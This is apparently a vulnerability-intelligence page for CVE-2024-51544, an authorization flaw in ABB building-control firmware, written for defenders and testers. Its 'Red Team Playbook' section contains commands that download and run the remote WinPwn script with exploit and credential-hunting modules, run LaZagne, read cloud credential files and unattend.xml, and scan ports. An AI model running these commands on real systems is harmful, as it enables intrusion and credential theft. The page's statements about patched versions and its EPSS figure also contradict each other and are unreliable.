CVE-2024-51544
Overview
This vulnerability is a service control access flaw rooted in improper authorization controls within ABB ASPECT-Enterprise and related firmware versions. The issue arises from inadequate protection of service restart requests and virtual machine configuration settings, allowing unauthorized access to sensitive management functions. The affected components include service control interfaces responsible for managing operational parameters and VM configurations in ABB ASPECT-Enterprise v3.08.02 and associated series firmware.
Vulnerability Description
Service Control vulnerabilities allow access to service restart requests and vm configuration settings. Affected products: ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02
Impact
An unauthenticated remote attacker can exploit this vulnerability to restart critical services and alter virtual machine configurations, potentially disrupting industrial control processes. Since no privileges or user interaction are required (CVSS AV:N/AC:L/PR:N/UI:N), the flaw enables immediate unauthorized control over system management functions. This can lead to operational downtime, reduced system availability, and potential lateral movement within the affected network environment, impacting business continuity and safety-critical operations.
Solution
ABB has released firmware updates addressing this vulnerability in ASPECT-Enterprise and related series, specifically version 3.08.02 and later. Users should apply the patches as documented in the ABB advisory (Document ID 9AKK108469A7497) available on ABB's official support portal. The advisory provides detailed instructions for upgrading affected firmware and recommends disabling or restricting network access to service control interfaces until updates are applied.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The identified vulnerability within the ABB ASPECT, NEXUS, and MATRIX Series products pertains to service control mechanisms, specifically allowing unauthorized access to service restart requests and virtual machine configuration settings. This flaw arises from inadequate access controls, which can be exploited by malicious actors to manipulate critical services and configurations. The underlying technical issue suggests that the affected systems do not properly authenticate or authorize users attempting to initiate service restarts or modify VM settings, leading to potential unauthorized access and control over system operations.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with network access to the affected systems could leverage this weakness to send crafted requests that trigger service restarts or alter VM configurations without proper authorization. This could be executed remotely, making it particularly dangerous in environments where these systems are deployed across distributed networks. Additionally, if an attacker gains initial access through other means, such as phishing or exploiting another vulnerability, they could escalate their privileges by manipulating service controls, thereby gaining further control over the infrastructure.
The real-world impact of this vulnerability poses significant risks to businesses relying on these ABB products. Unauthorized service restarts can lead to service disruptions, data loss, or corruption, ultimately affecting operational continuity. Furthermore, if an attacker modifies VM configurations, they could potentially expose sensitive data or disrupt critical business processes. The financial implications of such incidents can be severe, including costs associated with recovery efforts, potential regulatory fines, and damage to reputation. Organizations may also face legal liabilities if customer data is compromised due to inadequate security measures.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments and vulnerability scans can help identify and remediate weaknesses in the system. Employing strict access controls and ensuring that only authorized personnel can initiate service restarts or modify configurations is crucial. Additionally, implementing logging and monitoring solutions can provide visibility into system activities, allowing for the detection of suspicious behavior. Organizations should also consider applying patches or updates provided by ABB to address the vulnerability and enhance overall system security.
In conclusion, the service control vulnerabilities present in ABB's ASPECT, NEXUS, and MATRIX Series products represent a serious threat to the integrity and availability of critical business operations. The potential for unauthorized access to service controls and VM configurations underscores the need for robust security practices. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to defend against such threats and mitigate associated risks effectively.
CSURFACE threat intelligence has identified a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2024-51544, reflecting a growing likelihood of exploitation attempts targeting ABB’s ASPECT-Enterprise and related products. Although no new exploit code or active exploitation campaigns have been detected by our telemetry, the upward adjustment in EPSS—now approaching the 0.9 percentile—signals heightened attacker interest or improved feasibility of exploitation in operational environments. This subtle shift underscores the importance of continuous monitoring, as even incremental rises in predictive scores can precede emergent threat activity. Consequently, the risk posture for this vulnerability has been recalibrated to reflect a sustained high threat level, emphasizing that while immediate exploitation remains limited, the potential for impactful attacks exploiting service control weaknesses and VM configuration access persists and may accelerate without timely intervention.
Affected Products (19)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Abb | Aspect-Ent-12 Firmware | All |
cpe:2.3:o:abb:aspect-ent-12_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Aspect-Ent-2 Firmware | All |
cpe:2.3:o:abb:aspect-ent-2_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Aspect-Ent-256 Firmware | All |
cpe:2.3:o:abb:aspect-ent-256_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Aspect-Ent-96 Firmware | All |
cpe:2.3:o:abb:aspect-ent-96_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128 Firmware | All |
cpe:2.3:o:abb:nexus-2128_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128-A Firmware | All |
cpe:2.3:o:abb:nexus-2128-a_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128-F Firmware | All |
cpe:2.3:o:abb:nexus-2128-f_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128-G Firmware | All |
cpe:2.3:o:abb:nexus-2128-g_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264 Firmware | All |
cpe:2.3:o:abb:nexus-264_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264-A Firmware | All |
cpe:2.3:o:abb:nexus-264-a_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264-F Firmware | All |
cpe:2.3:o:abb:nexus-264-f_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264-G Firmware | All |
cpe:2.3:o:abb:nexus-264-g_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-3-2128 Firmware | All |
cpe:2.3:o:abb:nexus-3-2128_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-3-264 Firmware | All |
cpe:2.3:o:abb:nexus-3-264_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-11 Firmware | All |
cpe:2.3:o:abb:matrix-11_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-216 Firmware | All |
cpe:2.3:o:abb:matrix-216_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-232 Firmware | All |
cpe:2.3:o:abb:matrix-232_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-264 Firmware | All |
cpe:2.3:o:abb:matrix-264_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-296 Firmware | All |
cpe:2.3:o:abb:matrix-296_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-51544 |
| search.abb.com |
GitHub CVE
|
https://search.abb.com/library/Download.aspx?DocumentID=9AKK108469A7497&LanguageCode=en&DocumentPartId=&Action=Launch |